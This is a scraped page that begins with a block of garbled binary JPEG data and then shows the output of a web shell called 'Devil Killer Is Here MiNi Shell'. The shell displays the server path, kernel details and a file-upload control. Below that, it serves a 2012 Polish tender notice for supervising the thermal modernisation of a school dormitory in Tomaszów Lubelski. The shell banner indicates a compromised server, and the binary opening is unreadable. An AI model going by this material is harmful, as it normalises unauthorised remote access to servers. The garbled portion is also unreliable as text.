JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120529/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120529/176810-N-2012.html

<p class="kh_header"><b>Tomaszów Lubelski: Wykonanie usług w zakresie nadzoru inwestorskiego nad  realizacją zadania pn: Termomodernizacja budynków użyteczności publicznej stanowiących  mienie samorządów: miasta Tomaszów Lubelski  i powiatu tomaszowskiego -Internat Zespołu Szkół Nr 3 w Tomaszowie Lubelskim  przy ul. Hallera 5</b><br>
<b>Numer ogłoszenia: 176810 - 2012; data zamieszczenia: 29.05.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół nr 3 im. Macieja Rataja , ul. Hallera 5, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6650505, faks 084 6650505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsnr3.tk</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: JEDNOSTKA SAMORZĄDOWA.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usług w zakresie nadzoru inwestorskiego nad  realizacją zadania pn: Termomodernizacja budynków użyteczności publicznej stanowiących  mienie samorządów: miasta Tomaszów Lubelski  i powiatu tomaszowskiego -Internat Zespołu Szkół Nr 3 w Tomaszowie Lubelskim  przy ul. Hallera 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> wykonanie usług w zakresie nadzoru inwestorskiego w zakresie nadzoru inwestorskiego nad realizacją zadania pn Termomodernizacja budynków użyteczności publicznej stanowiących  mienie samorządów  miasta Tomaszów Lubelski  i powiatu tomaszowskiego Internat Zespołu Szkół Nr 3 w Tomaszowie Lubelskim  przy ul. Hallera 5, 
Zadania nadzoru inwestorskiego w czasie realizacji umowy.
Podstawowe obowiązki i uprawnienia inspektora oraz formalno-prawne podstawy
do jego działalności określają art. 17 i 18 oraz art. 25 i 26 ustawy z 7 lipca 1994r Prawo budowlane Dz. U. z 2010 roku Nr 243, poz. 1623 z późn. zm.) oraz kontrolowanie rozliczeń budowy.
Inspektor reprezentuje interesy zamawiającego na budowie poprzez sprawowanie
kontroli zgodności realizacji robót z dokumentacją projektową, specyfikacjami technicznymi wykonania i odbioru robót, przepisami w tym Prawa budowlanego, zasadami wiedzy technicznej oraz postanowieniami warunków umowy.
Inspektor wypełnia obowiązki i odpowiada za wszelkie decyzje, które podejmuje
w ramach kompetencji określonych szczegółowo w niniejszym opisie przedmiotu zamówienia oraz specyfikacjach technicznych wykonania i odbioru robót.
Do obowiązków inspektora nadzoru w szczególności należy
-zapoznanie się z dokumentacją techniczną projektem budowlanym, projektem
wykonawczym, specyfikacjami technicznymi wykonania i odbioru robót budowlanych w poszczególnych branżach, przedmiarami robót),dokumentacją prawną , terenem budowy,jego uzbrojeniem i zagospodarowaniem,
-poinformowanie Zamawiającego o wadach w dokumentacji projektowej i wykonawczej natychmiast po ich stwierdzeniu dla dokonania uzgodnień ewentualnych zmian projektowych w trakcie realizacji przedmiotu umowy,
-udział w protokolarnym przekazaniu placu budowy,
-sprawdzenie wytyczenia przez wykonawcę robót, sprawdzenie innych pomiarów
sytuacyjno-wysokościowych,
-organizacja prac związanych z nadzorem w celu uniknięcia zbędnych przerw w realizacji robót przez wykonawcę,
- kontrolowanie przestrzegania przez wykonawcę zasad BHP, oraz posiadanie i aktualizacji planu BIOZ ,
- zajmowanie stanowiska co do sposobu zabezpieczenia wszelkich wykopalisk odkrytych przez wykonawcę na placu budowy,
- akceptacja urządzeń zabezpieczających rejon robót, a także treści i miejsca ustawienia tablic informacyjnych budowy i ustalania długości odcinków roboczych wyłączonych z ruchu,
-prowadzenie systematycznej kontroli zgodności cech jakościowych elementów robót i materiałów z wymaganiami specyfikacji technicznych oraz dokumentacji projektowych - w oparciu o wyniki badań tych cech, dostarczonych przez wykonawcę,
- kontrola zgodności receptur i technologii z wymaganiami specyfikacji technicznych,
-akceptacja wszystkich materiałów stosowanych do przebudowy, pod kątem ich
rodzaju , jakości, cech i źródeł pochodzenia,
-kontrola i ocena przedkładanych świadectw jakościowych oraz atestów na materiały i elementy sprowadzane z zewnątrz,
-sprawdzanie jakości wykonywanych robót budowlanych i zamontowanych urządzeń
oraz wbudowanych materiałów budowlanych, a w szczególności zapobieganie
zastosowaniu materiałów i urządzeń o parametrach niezgodnych z dokumentacją i
zapobieganie zastosowaniu wyrobów budowlanych wadliwych i niedopuszczonych do stosowania w budownictwie
-egzekwowanie od wykonawcy dodatkowych badań i pomiarów, względnie
przeprowadzenia badań niezależnych - w przypadku wątpliwości co do wiarygodności badań wykonawcy,
-kontrolowanie sposobu składowania i przechowywania materiałów oraz uporządkowania miejsc składowania po zakończeniu robót,
-dokonywanie odbiorów robót zanikających i ulegających zakryciu - w terminie do 3 dni od daty zgłoszenia o odbiorze,
-uczestniczenie w czynnościach odbioru częściowego (etapowego) i odbioru ostatecznego,
- sprawdzenie kompletności przedstawionych przez wykonawcę dokumentów i oświadczeń niezbędnych do przeprowadzenia odbiorów,
-sprawdzenie zakresu rzeczowego robót przez udział w obmiarach,
-potwierdzanie w dzienniku budowy gotowości robót do odbioru częściowych i
ostatecznego,
-powiadomienie Zamawiającego o gotowości robót do odbiorów częściowych i odbioru ostatecznego,
-potwierdzanie faktycznie wykonanych robót oraz sprawdzanie prawidłowości i zgodności rozliczeń okresowych przed wystawieniem faktur częściowych oraz ostatecznego rozliczenia robót, w tym ustalenie ewentualnych potrąceń za wady trwałe w uzgodnieniu z zamawiającym,
-potwierdzenie wykonania prac mających na celu usunięcie wad i nieprawidłowości
stwierdzonych przy realizacji robót, oraz usunięcia ich w ramach przeglądów okresowych w okresie rękojmi gwarancji,
-kontrola prawidłowości prowadzenia dziennika budowy i dokonywania w nim wpisów
stwierdzających wszystkie okoliczności mające znaczenie dla oceny właściwego wykonania robót,
-rozstrzyganie w porozumieniu z kierownikiem budowy i przedstawicielem inwestora
wątpliwości natury technicznej powstałe w toku wykonywania robót, zasięgając w razie potrzeby opinii autora projektu budowlanego,
- ilość pobytów na budowie minimum 3 razy w tygodniu. Częstsze pobyty na budowie w zależności od potrzeb, życzenia inwestora lub kierownika budowy. Wszystkie pobyty na budowie muszą być udokumentowane wpisami do dziennika budowy, inspektor nadzoru zobowiązany jest do bezpośredniego uczestniczenia i nadzorowania w istotnych
dla właściwej realizacji elementów robót. Inspektor nadzoru zobowiązany jest do
zgłoszenia się na budowie w celu odbioru lub kontroli robót nie później niż w ciągu 24 godzin od telefonicznego powiadomienia przez wykonawcę robót lub zamawiającego,
- składanie i opiniowanie wniosków dotyczących robót,
- nadzór nad zabezpieczeniem przez wykonawcę terenu budowy w przypadku
wypowiedzenia umowy,
29/rozliczenie zakresu umowy w przypadku jej wypowiedzenia,
30/do obowiązków inspektora nadzoru należy sprawdzenie pod względem ilościowym
nakładów rzeczowych i zastosowanych cen wszystkich kosztorysów dodatkowych,
zamiennych, uzupełniających sporządzonych w trakcie realizacji zamówienia przez
wykonawcę robót,
- dokumentowanie wszelkich zmian, które zostały wprowadzone w trakcie realizacji
zadania w dokumentacji projektowej i przekazanie zamawiającemu w dniu odbioru
ostatecznego,
- w przypadku dokonywania ustaleń ustnych związanych z realizacją robót inspektor
nadzoru zobowiązany jest w terminie 2 dni do sporządzenia protokołu w formie pisemnej i uzyskania podpisów uczestników ustaleń,
- składanie bieżących informacji inwestorowi o postępach w realizacji robót, stwierdzonych nieprawidłowościach lub zagrożeniach w realizacji robót wynikających z zatwierdzonego przez zleceniodawcę harmonogramu robót,
- proponowanie rozwiązań zamiennych w stosunku do projektowanych w dokumentacji projektowej nie wymagających dodatkowych kosztów i zmiany terminowości wykonania zadania a podnoszących trwałość i funkcjonalność inwestycji,
- dopilnowanie przestrzegania przez wykonawcę realizacji robót zgodnej z zatwierdzonym przez zamawiającego harmonogramem rzeczowo-finansowym, stanowiącym załącznik do umowy z wykonawcą robót budowlanych,
- udzielanie zamawiającemu niezbędnych informacji w celu wykonywania prze niego
obowiązków sprawozdawczych w stosunku do Instytucji Zarządzającej,
37/comiesięczne monitorowanie ewaluacji produktów nadzorowanego projektu i udzielanie sprawozdań zamawiającemu.
38/przygotowanie we współpracy z wykonawcą robót dokumentacji finansowej ze
zrealizowanych robót budowlanych, niezbędnej do prawidłowego rozliczenia umowy
inwestycyjnej.
-Wszelkie odstępstwa od zgodności realizacji robót z dokumentacją projektową i
specyfikacjami technicznymi wymagają obowiązkowo zgody zamawiającego przed ich wykonaniem.
-Wykonanie robót przekraczających zakres rzeczowy ustalony w dokumentacji
projektowej wymaga obowiązkowo akceptacji zamawiającego przed ich wykonaniem.
-Zadania nadzoru inwestorskiego w czasie trwania okresu rękojmi gwarancji.
Inspektor nadzoru zobowiązany jest do wykonywania w okresie rękojmi gwarancji
corocznych przeglądów z udziałem inwestora i wykonawcy wykonanych robót i
przekazania zamawiającemu protokołu oceniającego stan obiektu występujących ewentualnych wadach lub usterkach  z punktu widzenia warunków gwarancji na 1 miesiąc przed upływem każdego  kolejnego roku liczonego od daty odbioru ostatecznego.
3.5.2.Nadzorowanie realizacji robót związanych z usuwaniem wad zaistniałych w okresie
rękojmi/gwarancji i poświadczenia ich wykonania.
-Potwierdzenie ostatecznego rozliczenia robót po okresie rękojmi gwarancji.
-Zamawiający dopuszcza wykonanie przedmiotu zamówienia przy udziale podwykonawców. Zamawiający  żąda wskazania przez wykonawcę w ofercie zakresu zamówienia (usług), których wykonanie wykonawca powierzy podwykonawcom.
-Roboty budowlane objęte nadzorem obejmują wykonanie zadania inwestycyjnego 
pn.Termomodernizacja budynków użyteczności publicznej stanowiących  mienie samorządów miasta Tomaszów Lubelski  i powiatu tomaszowskiego -Internat Zespołu Szkół Nr 3 w Tomaszowie Lubelskim  przy ul. Hallera 5  tj. robót obejmujących między innymi w zarysie
-Zakres robót termo modernizacyjnych zgodnie z wykonanym audytem
energetycznym obejmuje między innymi
-Docieplić ściany zewnętrzne styropianem o grubości 14 cm. Metoda lekka, mokra, BSO - bezspoinowy system ociepleń. Współczynnik przewodzenia ciepła styropianu =0,040 W(mK) 
-Docieplić ściany zewnętrzne szczytowe Internatu styropianem o grubości 12 cm. Metoda lekka, mokra, BSO - bezspoinowy system ociepleń. Współczynnik przewodzenia ciepła styropianu =0,040 W(mK). 
-Docieplić ściany zewnętrzne piwnic styropianem ekstradowanym o grubości 12 cm. Metoda lekka, mokra, BSO - bezspoinowy system ociepleń. Współczynnik przewodzenia ciepła styropianu 0,036 W mK). 
-Docieplić ściany w gruncie styropianem ekstradowanym o grubości 12 cm. Metoda lekka, mokra, BSO - bezspoinowy system ociepleń. Współczynnik przewodzenia ciepła styropianu 0,036 W(mK). 
-Docieplić stropodach pełny styropapą o grubości 15 cm .Współczynnik przewodzenia ciepła styropapy 0,040 W(mK). 
-Docieplić stropodach wentylowany  granulatem wełny mineralnej lub celulozy o grubości 18 cm. Współczynnik przewodzenia ciepła granulatu 0,050 W(mK). 
- Wymienić stare okna zewnętrzne na nowe z nawiewnikami o współczynniku U  1,4 W(m2K) montaż nawiewników w oknach istniejących już wymienionych. 
-Wymienić  stare drzwi zewnętrzne do budynku na nowe o współczynniku U 2,0  W(m2K).
-Zmodernizować system c.w.u.  montaż systemu solarnego złożonego z 24 szt. próżniowych kolektorów słonecznych , zasobników oraz wymiana instalacji rozprowadzającej.
-Zmodernizować system c.o. wymiana instalacji rozprowadzającej wraz z grzejnikami  montaż przygrzejnikowych zaworów termostatycznych  i  automatycznych odpowietrzników na pionach.
Roboty budowlane konieczne (przygotowawcze i towarzyszące), wynikające z robót
termomodernizacyjnych w zakresie 
a)wykonanie robót koniecznych związanych  z dociepleniem ścian - tynkowanie i malowanie koniecznych elementów na elewacji, które nie będą  docieplane,
b)przełożenie instalacji odgromowych,
c)wymiana zewnętrznych parapetów okiennych i obróbek blacharskich,
d) naprawy lokalnych uszkodzeń tynków oraz malowanie,
e)wykonanie wszelkich innych niezbędnych prac towarzyszących wynikających
z przepisów prawa budowlanego.
Zakres robót niezbędnych do wykonania został szczegółowo opisany w dokumentacji projektowej i przedmiarach robót oraz w specyfikacji technicznej wykonania i odbioru robót budowlanych. Dokumenty te dostępne są w wersji elektronicznej na stronie internetowej  Zespołu Szkół Nr 3 w Tomaszowie  Lubelskim  www.zsnr3.tk dokumenty przetargu nieograniczonego pn Termomodernizacja budynków użyteczności publicznej stanowiących  mienie samorządów miasta Tomaszów Lubelski  i powiatu tomaszowskiego -Internat Zespołu Szkół Nr 3 w Tomaszowie Lubelskim  przy ul. Hallera 5   znak sprawy postępowania   Z. Sz. Nr 3- 260 1 2012 ..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.52.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości  1000,00 zł (słownie: jeden tysiąc złotych).
Wadium należy wnieść przed upływem terminu składania ofert.
Wadium może być wnoszone w jednej lub kilku następujących formach:
a) w pieniądzu,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych;
d)gwarancjach ubezpieczeniowych;
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm. 
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy; 
  94 9620 0005 0000 3652 2000 0110  Bank Spółdzielczy w Łaszczowie
Za skuteczne wniesione wadium w pieniądzu zamawiający uważa wadium, które w
oznaczonym terminie znajdzie się na koncie zamawiającego. Jako potwierdzenie wniesienia wadium w formie poręczenia lub gwarancji należy,  dołączyć do oferty  oryginał. 
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi
na wezwanie, o którym mowa w art. 26 ust. 3 ustawy, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 ustawy, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie lezących po jego stronie.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana
-odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach
określonych w ofercie;
-zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z
przyczyn leżących po stronie wykonawcy.
-Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ust.4a ustawy. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesieniu zabezpieczenia należytego wykonania umowy. Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
-Jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami
wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane,
pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za
przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
-Z postępowania o udzielenie zamówienia wyklucza się wykonawców, którzy nie wnieśli wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy, albo nie zgodzili się na przedłużenie okresu związania ofertą. Art. 46 ust. 3 ustawy stanowi, że Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania zwrócono wadium, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. W tym przypadku Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
Wadium musi obejmować cały okres związania ofertą.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny przy składaniu oferty.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający uzna przedmiotowy warunek za spełniony przez Wykonawców, którzy:w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonali co najmniej jedną usługę polegającą na nadzorze inwestorskim nad robotami budowlanymi, tj. 
a/ budowie budynku użyteczności publicznej lub obiektu innego rodzaju, o powierzchni użytkowej co najmniej 1500 m2 i kubaturze co najmniej 6 000 m3, wykonując na tym obiekcie usługi w zakresie nadzoru o zbliżonym charakterze i funkcji, których sposób realizacji i skomplikowania jest podobny jak w przypadku usługi objętej niniejszym zamówieniem(roboty budowlane  tzw. termomodernizacyjne, instalacji c.o., c.w.u ,  instalacja -solarna oraz instalacji elektrycznej,
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają powyższe warunki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony przez wykonawców, którzy:
dysponują co najmniej 3 osobami zdolnymi do wykonania zamówienia. Osoby te powinny posiadać określone przepisami Prawa budowlanego (Dz. U. z 2010 r., Nr 243,poz. 1623 ze zm. kwalifikacje zawodowe konieczne do realizacji zamówienia w rozumieniu Prawa
budowlanego tj.:
powinny posiadać min. 5 letnie doświadczenie zawodowe- pełniły funkcje kierownika budowy, kierownika robót lub inspektora nadzoru o charakterze zbieżnym z zakresem robót będących przedmiotem zadania inwestycyjnego i z posiadanymi uprawnieniami tj.
a) dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej,
b) dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń wodociągowych, kanalizacyjnych, cieplnych, wentylacyjnych i gazowych,
c) dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
2.Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień
budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniejszych obowiązujących przepisów.
3.W przypadku nabycia uprawnień budowlanych w innym kraju będą także uznawane kwalifikacje zawodowe nabyte w państwach członkowskich Unii Europejskiej oraz w innych państwach Europejskiego obszaru Gospodarczego (Euro pean Ekonomic Area - EEA ) i Konfederacji Szwajcarskiej z zastrzeżeniem art. 12 a oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz.U. z 2008 r., Nr 63, poz. 394).
4.Jeżeli wykonawca nie dysponuje w/w osobami, to przedstawi pisemne zobowiązanie innych podmiotów do udostępnienia w/w osób które będą uczestniczyć w realizacji zamówienia.
Ocena spełnienia warunku dysponowania osobami zdolnymi do wykonania zamówienia dokonana zostanie na podstawie złozonych dokumentów  wykaz , oświadczenie ,wg obowiązujących przepisów Pzp</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.Zamawiający uzna przedmiotowy warunek za spełniony przez wykonawców, którzy ubezpieczeni są od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej  z przedmiotem zamówienia na kwotę min. 100 000 zł. na cały zakres robót w poszczególnych branżach, 
Jeżeli wykonawca polega na zdolnościach finansowych innych podmiotów, winien udowodnić, że będzie dysponował tymi zasobami.
Ocena spełnienia przez Wykonawcę warunków udziału w postępowaniu odbywać się
będzie na podstawie przedłożonych przez Wykonawcę dokumentów i oświadczeń (pkt.7 SIWZ) potwierdzających spełnianie warunków udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

